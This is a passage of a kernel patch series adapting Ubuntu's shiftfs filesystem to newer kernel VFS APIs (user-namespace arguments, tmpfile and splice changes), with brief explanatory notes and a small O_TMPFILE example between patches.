+> support for various device drivers and procfs/debugfs files.  If splice
+> support for any of those turns out to be important it can be added back
+> by switching them to the iter ops and using generic_file_splice_read.
+
+this means that currently all workloads making use of sendfile() on
+shiftfs fail. This includes LXD, Anbox and a range of others. Fix this
+by providing explicit .splice_read() and .splice_write() methods, which
+just restores the status quo: we keep using a generic method provided
+by the vfs.
+
+Cc: Seth Forshee <sforshee@kernel.org>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Paolo Pisati <paolo.pisati@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index abeb7db3b9be..f5f6d8d8144e 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1737,6 +1737,8 @@ const struct file_operations shiftfs_file_operations = {
+ 	.compat_ioctl		= shiftfs_compat_ioctl,
+ 	.copy_file_range	= shiftfs_copy_file_range,
+ 	.remap_file_range	= shiftfs_remap_file_range,
++	.splice_read		= generic_file_splice_read,
++	.splice_write		= iter_file_splice_write,
+ };
+ 
+ const struct file_operations shiftfs_dir_operations = {
+-- 
+2.39.2
+
+From ff28712d9e52b3b0b2127e9898b96f7c1e11bd26 Mon Sep 17 00:00:00 2001
+From: Andrea Righi <andrea.righi@canonical.com>
+Date: Thu, 20 Jan 2022 16:55:24 +0100
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support kernel 5.15
+Cc: mpagano@gentoo.org
+
+WARNING: after this change we may see some regressions if shiftfs is
+used with filesystem namespaces.
+
+Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 107 ++++++++++++++++++++++++++++++---------------------
+ 1 file changed, 64 insertions(+), 43 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index f5f6d8d8144e..76c54bc12018 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -308,7 +308,8 @@ static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
+ 	return p;
+ }
+ 
+-static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
++static int shiftfs_setxattr(struct user_namespace *ns,
++			    struct dentry *dentry, struct inode *inode,
+ 			    const char *name, const void *value,
+ 			    size_t size, int flags)
+ {
+@@ -317,7 +318,7 @@ static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
+ 	const struct cred *oldcred;
+ 
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+-	err = vfs_setxattr(lowerd, name, value, size, flags);
++	err = vfs_setxattr(ns, lowerd, name, value, size, flags);
+ 	revert_creds(oldcred);
+ 
+ 	shiftfs_copyattr(lowerd->d_inode, inode);
+@@ -334,7 +335,7 @@ static int shiftfs_xattr_get(const struct xattr_handler *handler,
+ 	const struct cred *oldcred;
+ 
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+-	err = vfs_getxattr(lowerd, name, value, size);
++	err = vfs_getxattr(&init_user_ns, lowerd, name, value, size);
+ 	revert_creds(oldcred);
+ 
+ 	return err;
+@@ -354,14 +355,15 @@ static ssize_t shiftfs_listxattr(struct dentry *dentry, char *list,
+ 	return err;
+ }
+ 
+-static int shiftfs_removexattr(struct dentry *dentry, const char *name)
++static int shiftfs_removexattr(struct user_namespace *ns,
++			       struct dentry *dentry, const char *name)
+ {
+ 	struct dentry *lowerd = dentry->d_fsdata;
+ 	int err;
+ 	const struct cred *oldcred;
+ 
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+-	err = vfs_removexattr(lowerd, name);
++	err = vfs_removexattr(ns, lowerd, name);
+ 	revert_creds(oldcred);
+ 
+ 	/* update c/mtime */
+@@ -371,13 +373,14 @@ static int shiftfs_removexattr(struct dentry *dentry, const char *name)
+ }
+ 
+ static int shiftfs_xattr_set(const struct xattr_handler *handler,
++			     struct user_namespace *ns,
+ 			     struct dentry *dentry, struct inode *inode,
+ 			     const char *name, const void *value, size_t size,
+ 			     int flags)
+ {
+ 	if (!value)
+-		return shiftfs_removexattr(dentry, name);
+-	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
++		return shiftfs_removexattr(ns, dentry, name);
++	return shiftfs_setxattr(ns, dentry, inode, name, value, size, flags);
+ }
+ 
+ static int shiftfs_inode_test(struct inode *inode, void *data)
+@@ -391,7 +394,8 @@ static int shiftfs_inode_set(struct inode *inode, void *data)
+ 	return 0;
+ }
+ 
+-static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
++static int shiftfs_create_object(struct user_namespace *ns,
++				 struct inode *diri, struct dentry *dentry,
+ 				 umode_t mode, const char *symlink,
+ 				 struct dentry *hardlink, bool excl)
+ {
+@@ -453,7 +457,7 @@ static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
+ 		inode->i_state |= I_CREATING;
+ 		spin_unlock(&inode->i_lock);
+ 
+-		inode_init_owner(inode, diri, mode);
++		inode_init_owner(ns, inode, diri, mode);
+ 		modei = inode->i_mode;
+ 	}
+ 
+@@ -464,22 +468,22 @@ static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
+ 
+ 	if (hardlink) {
+ 		lowerd_link = hardlink->d_fsdata;
+-		err = vfs_link(lowerd_link, loweri_dir, lowerd_new, NULL);
++		err = vfs_link(lowerd_link, ns, loweri_dir, lowerd_new, NULL);
+ 	} else {
+ 		switch (modei & S_IFMT) {
+ 		case S_IFDIR:
+-			err = vfs_mkdir(loweri_dir, lowerd_new, modei);
++			err = vfs_mkdir(ns, loweri_dir, lowerd_new, modei);
+ 			break;
+ 		case S_IFREG:
+-			err = vfs_create(loweri_dir, lowerd_new, modei, excl);
++			err = vfs_create(ns, loweri_dir, lowerd_new, modei, excl);
+ 			break;
+ 		case S_IFLNK:
+-			err = vfs_symlink(loweri_dir, lowerd_new, symlink);
++			err = vfs_symlink(ns, loweri_dir, lowerd_new, symlink);
+ 			break;
+ 		case S_IFSOCK:
+ 			/* fall through */
+ 		case S_IFIFO:
+-			err = vfs_mknod(loweri_dir, lowerd_new, modei, 0);
++			err = vfs_mknod(ns, loweri_dir, lowerd_new, modei, 0);
+ 			break;
+ 		default:
+ 			err = -EINVAL;
+@@ -535,41 +539,43 @@ static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
+ 	return err;
+ }
+ 
+-static int shiftfs_create(struct inode *dir, struct dentry *dentry,
++static int shiftfs_create(struct user_namespace *ns,
++			  struct inode *dir, struct dentry *dentry,
+ 			  umode_t mode,  bool excl)
+ {
+ 	mode |= S_IFREG;
+ 
+-	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, excl);
++	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, excl);
+ }
+ 
+-static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry,
++static int shiftfs_mkdir(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
+ 			 umode_t mode)
+ {
+ 	mode |= S_IFDIR;
+ 
+-	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
++	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false);
+ }
+ 
+ static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
+ 			struct dentry *dentry)
+ {
+-	return shiftfs_create_object(dir, dentry, 0, NULL, hardlink, false);
++	return shiftfs_create_object(&init_user_ns, dir, dentry, 0, NULL, hardlink, false);
+ }
+ 
+-static int shiftfs_mknod(struct inode *dir, struct dentry *dentry, umode_t mode,
++static int shiftfs_mknod(struct user_namespace *ns,
++			 struct inode *dir, struct dentry *dentry, umode_t mode,
+ 			 dev_t rdev)
+ {
+ 	if (!S_ISFIFO(mode) && !S_ISSOCK(mode))
+ 		return -EPERM;
+ 
+-	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
++	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false);
+ }
+ 
+-static int shiftfs_symlink(struct inode *dir, struct dentry *dentry,
++static int shiftfs_symlink(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
+ 			   const char *symlink)
+ {
+-	return shiftfs_create_object(dir, dentry, S_IFLNK, symlink, NULL, false);
++	return shiftfs_create_object(ns, dir, dentry, S_IFLNK, symlink, NULL, false);
+ }
+ 
+ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+@@ -584,9 +590,9 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+ 	inode_lock_nested(loweri, I_MUTEX_PARENT);
+ 	if (rmdir)
+-		err = vfs_rmdir(loweri, lowerd);
++		err = vfs_rmdir(&init_user_ns, loweri, lowerd);
+ 	else
+-		err = vfs_unlink(loweri, lowerd, NULL);
++		err = vfs_unlink(&init_user_ns, loweri, lowerd, NULL);
+ 	revert_creds(oldcred);
+ 
+ 	if (!err) {
+@@ -615,7 +621,8 @@ static int shiftfs_rmdir(struct inode *dir, struct dentry *dentry)
+ 	return shiftfs_rm(dir, dentry, true);
+ }
+ 
+-static int shiftfs_rename(struct inode *olddir, struct dentry *old,
++static int shiftfs_rename(struct user_namespace *ns,
++			  struct inode *olddir, struct dentry *old,
+ 			  struct inode *newdir, struct dentry *new,
+ 			  unsigned int flags)
+ {
+@@ -625,6 +632,14 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
+ 		      *trapd;
+ 	struct inode *loweri_dir_old = lowerd_dir_old->d_inode,
+ 		     *loweri_dir_new = lowerd_dir_new->d_inode;
++	struct renamedata rd = {
++		.old_mnt_userns	= ns,
++		.old_dir	= loweri_dir_old,
++		.old_dentry	= lowerd_old,
++		.new_mnt_userns	= ns,
++		.new_dir	= loweri_dir_new,
++		.new_dentry	= lowerd_new,
++	};
+ 	int err = -EINVAL;
+ 	const struct cred *oldcred;
+ 
+@@ -634,8 +649,7 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
+ 		goto out_unlock;
+ 
+ 	oldcred = shiftfs_override_creds(old->d_sb);
+-	err = vfs_rename(loweri_dir_old, lowerd_old, loweri_dir_new, lowerd_new,
+-			 NULL, flags);
++	err = vfs_rename(&rd);
+ 	revert_creds(oldcred);
+ 
+ 	shiftfs_copyattr(loweri_dir_old, olddir);
+@@ -691,7 +705,7 @@ static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry,
+ 	return d_splice_alias(inode, dentry);
+ }
+ 
+-static int shiftfs_permission(struct inode *inode, int mask)
++static int shiftfs_permission(struct user_namespace *ns, struct inode *inode, int mask)
+ {
+ 	int err;
+ 	const struct cred *oldcred;
+@@ -702,12 +716,12 @@ static int shiftfs_permission(struct inode *inode, int mask)
+ 		return -ECHILD;
+ 	}
+ 
+-	err = generic_permission(inode, mask);
++	err = generic_permission(ns, inode, mask);
+ 	if (err)
+ 		return err;
+ 
+ 	oldcred = shiftfs_override_creds(inode->i_sb);
+-	err = inode_permission(loweri, mask);
++	err = inode_permission(ns, loweri, mask);
+ 	revert_creds(oldcred);
+ 
+ 	return err;
+@@ -733,7 +747,8 @@ static int shiftfs_fiemap(struct inode *inode,
+ 	return err;
+ }
+ 
+-static int shiftfs_tmpfile(struct inode *dir, struct dentry *dentry,
++static int shiftfs_tmpfile(struct user_namespace *ns,
++			   struct inode *dir, struct dentry *dentry,
+ 			   umode_t mode)
+ {
+ 	int err;
+@@ -745,13 +760,13 @@ static int shiftfs_tmpfile(struct inode *dir, struct dentry *dentry,
+ 		return -EOPNOTSUPP;
+ 
+ 	oldcred = shiftfs_override_creds(dir->i_sb);
+-	err = loweri->i_op->tmpfile(loweri, lowerd, mode);
++	err = loweri->i_op->tmpfile(ns, loweri, lowerd, mode);
+ 	revert_creds(oldcred);
+ 
+ 	return err;
+ }
+ 
+-static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
++static int shiftfs_setattr(struct user_namespace *ns, struct dentry *dentry, struct iattr *attr)
+ {
+ 	struct dentry *lowerd = dentry->d_fsdata;
+ 	struct inode *loweri = lowerd->d_inode;
+@@ -761,7 +776,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ 	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
+ 	int err;
+ 
+-	err = setattr_prepare(dentry, attr);
++	err = setattr_prepare(ns, dentry, attr);
+ 	if (err)
+ 		return err;
+ 
+@@ -778,7 +793,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ 
+ 	inode_lock(loweri);
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+-	err = notify_change(lowerd, &newattr, NULL);
++	err = notify_change(ns, lowerd, &newattr, NULL);
+ 	revert_creds(oldcred);
+ 	inode_unlock(loweri);
+ 
+@@ -787,7 +802,8 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ 	return err;
+ }
+ 
+-static int shiftfs_getattr(const struct path *path, struct kstat *stat,
++static int shiftfs_getattr(struct user_namespace *ns,
++			   const struct path *path, struct kstat *stat,
+ 			   u32 request_mask, unsigned int query_flags)
+ {
+ 	struct inode *inode = path->dentry->d_inode;
+@@ -870,9 +886,9 @@ shift_acl_xattr_ids(struct user_namespace *from, struct user_namespace *to,
+ 			entry->e_id = cpu_to_le32(from_kuid(&init_user_ns, kuid));
+ 			break;
+ 		case ACL_GROUP:
+-			kgid = make_kgid(&init_user_ns, le32_to_cpu(entry->e_id));
++			kgid = make_kgid(from, le32_to_cpu(entry->e_id));
+ 			kgid = shift_kgid(from, to, kgid);
+-			entry->e_id = cpu_to_le32(from_kgid(&init_user_ns, kgid));
++			entry->e_id = cpu_to_le32(from_kgid(from, kgid));
+ 			break;
+ 		default:
+ 			break;
+@@ -880,7 +896,8 @@ shift_acl_xattr_ids(struct user_namespace *from, struct user_namespace *to,
+ 	}
+ }
+ 
+-static struct posix_acl *shiftfs_get_acl(struct inode *inode, int type)
++static struct posix_acl *
++shiftfs_get_acl(struct inode *inode, int type, bool rcu)
+ {
+ 	struct inode *loweri = inode->i_private;
+ 	const struct cred *oldcred;
+@@ -890,6 +907,9 @@ static struct posix_acl *shiftfs_get_acl(struct inode *inode, int type)
+ 	int size;
+ 	int err;
+ 
++	if (rcu)
++		return ERR_PTR(-ECHILD);
++
+ 	if (!IS_POSIXACL(loweri))
+ 		return NULL;
+ 
+@@ -941,6 +961,7 @@ shiftfs_posix_acl_xattr_get(const struct xattr_handler *handler,
+ 
+ static int
+ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
++			    struct user_namespace *ns,
+ 			    struct dentry *dentry, struct inode *inode,
+ 			    const char *name, const void *value,
+ 			    size_t size, int flags)
+@@ -952,17 +973,17 @@ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
+ 		return -EOPNOTSUPP;
+ 	if (handler->flags == ACL_TYPE_DEFAULT && !S_ISDIR(inode->i_mode))
+ 		return value ? -EACCES : 0;
+-	if (!inode_owner_or_capable(inode))
++	if (!inode_owner_or_capable(ns, inode))
+ 		return -EPERM;
+ 
+ 	if (value) {
+ 		shift_acl_xattr_ids(inode->i_sb->s_user_ns,
+ 				    loweri->i_sb->s_user_ns,
+ 				    (void *)value, size);
+-		err = shiftfs_setxattr(dentry, inode, handler->name, value,
++		err = shiftfs_setxattr(ns, dentry, inode, handler->name, value,
+ 				       size, flags);
+ 	} else {
+-		err = shiftfs_removexattr(dentry, handler->name);
++		err = shiftfs_removexattr(ns, dentry, handler->name);
+ 	}
+ 
+ 	if (!err)
+-- 
+2.39.2
+
+From df4546ab77323af5bd40996244af7ade6c99054b Mon Sep 17 00:00:00 2001
+From: Andrea Righi <andrea.righi@canonical.com>
+Date: Wed, 13 Apr 2022 15:26:22 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: always rely on init_user_ns
+Cc: mpagano@gentoo.org
+
+With the porting of shiftfs from 5.15 to 5.17, some filesystem-related
+functions are now passed a struct user_namespace argument; however,
+shiftfs logic still relies on the fact that these functions need to
+use the main filesystem namespace.
+
+Make sure to always use init_user_ns to prevent breakage of system
+components that rely on shiftfs.
+
+Without this fix lxd was showing some issues, like failing to create any
+file inside a container when shiftfs was used (e.g., using zfs as the
+storage pool).
+
+Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 50 ++++++++++++++++++++++++--------------------------
+ 1 file changed, 24 insertions(+), 26 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 76c54bc12018..a21624c529f0 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -308,8 +308,7 @@ static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
+ 	return p;
+ }
+ 
+-static int shiftfs_setxattr(struct user_namespace *ns,
+-			    struct dentry *dentry, struct inode *inode,
++static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
+ 			    const char *name, const void *value,
+ 			    size_t size, int flags)
+ {
+@@ -318,7 +317,7 @@ static int shiftfs_setxattr(struct user_namespace *ns,
+ 	const struct cred *oldcred;
+ 
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+-	err = vfs_setxattr(ns, lowerd, name, value, size, flags);
++	err = vfs_setxattr(&init_user_ns, lowerd, name, value, size, flags);
+ 	revert_creds(oldcred);
+ 
+ 	shiftfs_copyattr(lowerd->d_inode, inode);
+@@ -363,7 +362,7 @@ static int shiftfs_removexattr(struct user_namespace *ns,
+ 	const struct cred *oldcred;
+ 
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+-	err = vfs_removexattr(ns, lowerd, name);
++	err = vfs_removexattr(&init_user_ns, lowerd, name);
+ 	revert_creds(oldcred);
+ 
+ 	/* update c/mtime */
+@@ -379,8 +378,8 @@ static int shiftfs_xattr_set(const struct xattr_handler *handler,
+ 			     int flags)
+ {
+ 	if (!value)
+-		return shiftfs_removexattr(ns, dentry, name);
+-	return shiftfs_setxattr(ns, dentry, inode, name, value, size, flags);
++		return shiftfs_removexattr(&init_user_ns, dentry, name);
++	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
+ }
+ 
+ static int shiftfs_inode_test(struct inode *inode, void *data)
+@@ -394,8 +393,7 @@ static int shiftfs_inode_set(struct inode *inode, void *data)
+ 	return 0;
+ }
+ 
+-static int shiftfs_create_object(struct user_namespace *ns,
+-				 struct inode *diri, struct dentry *dentry,
++static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
+ 				 umode_t mode, const char *symlink,
+ 				 struct dentry *hardlink, bool excl)
+ {
+@@ -457,7 +455,7 @@ static int shiftfs_create_object(struct user_namespace *ns,
+ 		inode->i_state |= I_CREATING;
+ 		spin_unlock(&inode->i_lock);
+ 
+-		inode_init_owner(ns, inode, diri, mode);
++		inode_init_owner(&init_user_ns, inode, diri, mode);
+ 		modei = inode->i_mode;
+ 	}
+ 
+@@ -468,22 +466,22 @@ static int shiftfs_create_object(struct user_namespace *ns,
+ 
+ 	if (hardlink) {
+ 		lowerd_link = hardlink->d_fsdata;
+-		err = vfs_link(lowerd_link, ns, loweri_dir, lowerd_new, NULL);
++		err = vfs_link(lowerd_link, &init_user_ns, loweri_dir, lowerd_new, NULL);
+ 	} else {
+ 		switch (modei & S_IFMT) {
+ 		case S_IFDIR:
+-			err = vfs_mkdir(ns, loweri_dir, lowerd_new, modei);
++			err = vfs_mkdir(&init_user_ns, loweri_dir, lowerd_new, modei);
+ 			break;
+ 		case S_IFREG:
+-			err = vfs_create(ns, loweri_dir, lowerd_new, modei, excl);
++			err = vfs_create(&init_user_ns, loweri_dir, lowerd_new, modei, excl);
+ 			break;
+ 		case S_IFLNK:
+-			err = vfs_symlink(ns, loweri_dir, lowerd_new, symlink);
++			err = vfs_symlink(&init_user_ns, loweri_dir, lowerd_new, symlink);
+ 			break;
+ 		case S_IFSOCK:
+ 			/* fall through */
+ 		case S_IFIFO:
+-			err = vfs_mknod(ns, loweri_dir, lowerd_new, modei, 0);
++			err = vfs_mknod(&init_user_ns, loweri_dir, lowerd_new, modei, 0);
+ 			break;
+ 		default:
+ 			err = -EINVAL;
+@@ -545,7 +543,7 @@ static int shiftfs_create(struct user_namespace *ns,
+ {
+ 	mode |= S_IFREG;
+ 
+-	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, excl);
++	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, excl);
+ }
+ 
+ static int shiftfs_mkdir(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
+@@ -553,13 +551,13 @@ static int shiftfs_mkdir(struct user_namespace *ns, struct inode *dir, struct de
+ {
+ 	mode |= S_IFDIR;
+ 
+-	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false);
++	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
+ }
+ 
+ static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
+ 			struct dentry *dentry)
+ {
+-	return shiftfs_create_object(&init_user_ns, dir, dentry, 0, NULL, hardlink, false);
++	return shiftfs_create_object(dir, dentry, 0, NULL, hardlink, false);
+ }
+ 
+ static int shiftfs_mknod(struct user_namespace *ns,
+@@ -569,13 +567,13 @@ static int shiftfs_mknod(struct user_namespace *ns,
+ 	if (!S_ISFIFO(mode) && !S_ISSOCK(mode))
+ 		return -EPERM;
+ 
+-	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false);
++	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
+ }
+ 
+ static int shiftfs_symlink(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
+ 			   const char *symlink)
+ {
+-	return shiftfs_create_object(ns, dir, dentry, S_IFLNK, symlink, NULL, false);
++	return shiftfs_create_object(dir, dentry, S_IFLNK, symlink, NULL, false);
+ }
+ 
+ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+@@ -716,12 +714,12 @@ static int shiftfs_permission(struct user_namespace *ns, struct inode *inode, in
+ 		return -ECHILD;
+ 	}
+ 
+-	err = generic_permission(ns, inode, mask);
++	err = generic_permission(&init_user_ns, inode, mask);
+ 	if (err)
+ 		return err;
+ 
+ 	oldcred = shiftfs_override_creds(inode->i_sb);
+-	err = inode_permission(ns, loweri, mask);
++	err = inode_permission(&init_user_ns, loweri, mask);
+ 	revert_creds(oldcred);
+ 
+ 	return err;
+@@ -760,7 +758,7 @@ static int shiftfs_tmpfile(struct user_namespace *ns,
+ 		return -EOPNOTSUPP;
+ 
+ 	oldcred = shiftfs_override_creds(dir->i_sb);
+-	err = loweri->i_op->tmpfile(ns, loweri, lowerd, mode);
++	err = loweri->i_op->tmpfile(&init_user_ns, loweri, lowerd, mode);
+ 	revert_creds(oldcred);
+ 
+ 	return err;
+@@ -776,7 +774,7 @@ static int shiftfs_setattr(struct user_namespace *ns, struct dentry *dentry, str
+ 	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
+ 	int err;
+ 
+-	err = setattr_prepare(ns, dentry, attr);
++	err = setattr_prepare(&init_user_ns, dentry, attr);
+ 	if (err)
+ 		return err;
+ 
+@@ -793,7 +791,7 @@ static int shiftfs_setattr(struct user_namespace *ns, struct dentry *dentry, str
+ 
+ 	inode_lock(loweri);
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+-	err = notify_change(ns, lowerd, &newattr, NULL);
++	err = notify_change(&init_user_ns, lowerd, &newattr, NULL);
+ 	revert_creds(oldcred);
+ 	inode_unlock(loweri);
+ 
+@@ -980,10 +978,10 @@ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
+ 		shift_acl_xattr_ids(inode->i_sb->s_user_ns,
+ 				    loweri->i_sb->s_user_ns,
+ 				    (void *)value, size);
+-		err = shiftfs_setxattr(ns, dentry, inode, handler->name, value,
++		err = shiftfs_setxattr(dentry, inode, handler->name, value,
+ 				       size, flags);
+ 	} else {
+-		err = shiftfs_removexattr(ns, dentry, handler->name);
++		err = shiftfs_removexattr(&init_user_ns, dentry, handler->name);
+ 	}
+ 
+ 	if (!err)
+-- 
+2.39.2
+
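+For readers skimming the hunks above, note the one bracket pattern repeated
+around every call into the lower filesystem: override the credentials with the
+ones stashed at mount time, perform the lower-layer operation, then restore the
+caller's credentials. A minimal sketch of that bracket, mirroring the calls in
+the diff (shiftfs_override_creds is shiftfs-internal; treat this as an
+illustration, not a definitive reference):
+
+	const struct cred *oldcred;
+	int err;
+
+	/* act on the lower inode with the superblock's saved creds */
+	oldcred = shiftfs_override_creds(inode->i_sb);
+	err = inode_permission(&init_user_ns, loweri, mask);
+	revert_creds(oldcred);	/* always restore, even on error */
+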
+From 3d0ac0887b4a57d883d194a6836501fa77aaf6e3 Mon Sep 17 00:00:00 2001
+From: Andrea Righi <andrea.righi@canonical.com>
+Date: Wed, 27 Apr 2022 18:20:41 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix missing include required in 5.18
+Cc: mpagano@gentoo.org
+
+Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index a21624c529f0..a5338dc6290c 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -21,6 +21,7 @@
+ #include <linux/posix_acl_xattr.h>
+ #include <linux/uio.h>
+ #include <linux/fiemap.h>
++#include <linux/pagemap.h>
+ 
+ struct shiftfs_super_info {
+ 	struct vfsmount *mnt;
+-- 
+2.39.2
+
+From 6cbfd564842eeb9adb495a3de704d125418825f9 Mon Sep 17 00:00:00 2001
+From: Andrea Righi <andrea.righi@canonical.com>
+Date: Tue, 18 Oct 2022 17:09:12 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support kernel 6.1
+Cc: mpagano@gentoo.org
+
+Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 5 ++---
+ 1 file changed, 2 insertions(+), 3 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index a5338dc6290c..34f080ae0fec 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -747,19 +747,18 @@ static int shiftfs_fiemap(struct inode *inode,
+ }
+ 
+ static int shiftfs_tmpfile(struct user_namespace *ns,
+-			   struct inode *dir, struct dentry *dentry,
++			   struct inode *dir, struct file *file,
+ 			   umode_t mode)
+ {
+ 	int err;
+ 	const struct cred *oldcred;
+-	struct dentry *lowerd = dentry->d_fsdata;
+ 	struct inode *loweri = dir->i_private;
+ 
+ 	if (!loweri->i_op->tmpfile)
+ 		return -EOPNOTSUPP;
+ 
+ 	oldcred = shiftfs_override_creds(dir->i_sb);
+-	err = loweri->i_op->tmpfile(&init_user_ns, loweri, lowerd, mode);
++	err = loweri->i_op->tmpfile(&init_user_ns, loweri, file, mode);
+ 	revert_creds(oldcred);
+ 
+ 	return err;
+-- 
+2.39.2
+
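+For context on the rework above: in v6.1 the VFS changed ->tmpfile() to
+receive the open struct file rather than a dentry, which is what this diff
+adapts to. From userspace, this hook backs the O_TMPFILE open flag. A
+minimal, hedged usage sketch in plain C (assumes the underlying filesystem
+supports O_TMPFILE):
+
+	#define _GNU_SOURCE
+	#include <fcntl.h>
+	#include <stdio.h>
+	#include <unistd.h>
+
+	int main(void)
+	{
+		/* unnamed temporary file in "."; exercises ->tmpfile() */
+		int fd = open(".", O_TMPFILE | O_RDWR, 0600);
+
+		if (fd < 0) {
+			perror("open(O_TMPFILE)"); /* e.g. EOPNOTSUPP */
+			return 1;
+		}
+		if (write(fd, "scratch", 7) != 7)
+			perror("write");
+		close(fd);	/* the file vanishes: it never had a name */
+		return 0;
+	}
+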
+From 63014ad24c3b175e503324461ded0a6a8ed12ab6 Mon Sep 17 00:00:00 2001
+From: Alexander Mikhalitsyn <aleksandr.mikhalitsyn@canonical.com>
+Date: Tue, 31 Jan 2023 17:11:48 +0100
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix -EOVERFLOW inside the container
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1990849
+
+We have never supported idmapped layers with shiftfs and, moreover, that makes
+no sense: once lower filesystems support idmapped mounts, shiftfs is not needed.
+
+Starting from linux-image-5.15.0-48-generic, users started seeing EOVERFLOW
+errors from the userspace side on trivial fs operations inside containers.
+
+This is caused by the patches ("fs: tweak fsuidgid_has_mapping()") and
+("fs: support mapped mounts of mapped filesystems"). These patches extend
+and enable idmapped mounts support in the Ubuntu kernel, but the problem is
+that shiftfs was not properly ported to match.
+
+See also:
+("namei: prepare for idmapped mounts")
+https://lore.kernel.org/all/20210121131959.646623-15-christian.brauner@ubuntu.com/
+("overlayfs: do not mount on top of idmapped mounts")
+https://lore.kernel.org/all/20210121131959.646623-29-christian.brauner@ubuntu.com/
+as a reference.
+
+This patch should be applied on top of kinetic/master-next and is based on the
+changes by Andrea Righi 4c934edc66 ("UBUNTU: SAUCE: shiftfs: always rely on init_user_ns")
+
+This commit, together with 4c934edc66 ("UBUNTU: SAUCE: shiftfs: always rely on init_user_ns"),
+has to be ported to the jammy tree too.
+
+Fixes: d347e71d2c0 ("UBUNTU: [SAUCE] shiftfs: support kernel 5.15")
+Reported-by: Thomas Parrott <thomas.parrott@canonical.com>
+Signed-off-by: Alexander Mikhalitsyn <aleksandr.mikhalitsyn@canonical.com>
+Acked-by: Tim Gardner <tim.gardner@canonical.com>
+Acked-by: Andrea Righi <andrea.righi@canonical.com>
